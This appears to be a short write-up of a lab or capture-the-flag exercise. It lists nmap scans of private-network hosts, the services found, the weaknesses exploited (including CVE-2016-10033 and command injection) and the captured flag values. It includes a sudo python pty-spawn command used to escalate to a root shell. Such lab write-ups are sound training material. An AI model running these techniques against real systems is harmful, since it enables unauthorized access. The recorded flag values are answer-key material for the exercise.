- Exposed Services
- Critical Vulnerabilities
- Exploitation
Target 1
$ nmap -sV --version-all 192.168.1.110
Target 2
$ nmap -sV -O 192.168.1.115
ELK Server
$ nmap -sV --version-all 192.168.1.100
Capstone
$ nmap -sV --version-all 192.168.1.105
Kali
$ nmap -sV --version-all 192.168.1.90
NAT Switch
$ nmap -sV --version-all 192.168.1.1
Target 1

| PORT | STATE | SERVICE | VERSION |
|---|---|---|---|
| 22/tcp | open | ssh | OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) |
| 80/tcp | open | http | Apache httpd 2.4.10 (Debian) |

Target 2

| PORT | STATE | SERVICE | VERSION |
|---|---|---|---|
| 22/tcp | open | ssh | OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) |
| 80/tcp | open | http | Apache httpd 2.4.10 (Debian) |
- Exposure of Information through Directory Listing (CWE-548) -- Severity: Low
- Weak Password Requirements (CWE-521)
- Improper Access Control (CWE-284)
- Improper Privilege Management (CWE-269)
- Remote Code Execution (CVE-2016-10033)
- Command Injection (CWE-77)
Target 1

- flag1.txt: b9bbcb33e11b80be759c4e844862482d
  - Exploit Used: CWE-548: Exposure of Information through Directory Listing
  - $ nano /var/www/html/service.html
- flag2.txt: fc3fd58dcdad9ab23faca6e9a36e581c
  - Exploit Used: CWE-521: Weak Password Requirements
  - $ cat /var/www/flag2.txt
- flag3.txt: afc01ab56b50591e7dccf93122770cd2
  - Exploit Used: CWE-284: Improper Access Control
  - mysql> SELECT * FROM wp_posts;
- flag4.txt: 715dea6c055b9fe3337544932f2941ce
  - Exploit Used: CWE-269: Improper Privilege Management
  - $ sudo python -c 'import pty;pty.spawn("/bin/bash")'
Target 2

- flag1.txt: a2c1f66d2b8051bd3a5874b5b6e43e21
  - Exploit Used: Remote Code Execution (CVE-2016-10033)
  - URL: 192.168.1.115/vendor/PATH
- flag2.txt: 6a8ed560f0b5358ecf844108048eb337
  - Exploit Used: Command Injection (CWE-77)
  - $ cat /var/www/flag2.txt
- flag3.txt: a0f568aa9de277887f37730d71520d9b
  - Exploit Used: Command Injection (CWE-77)
  - URL: 192.168.1.115/wordpress/wp-content/uploads/2018/11/flag3.png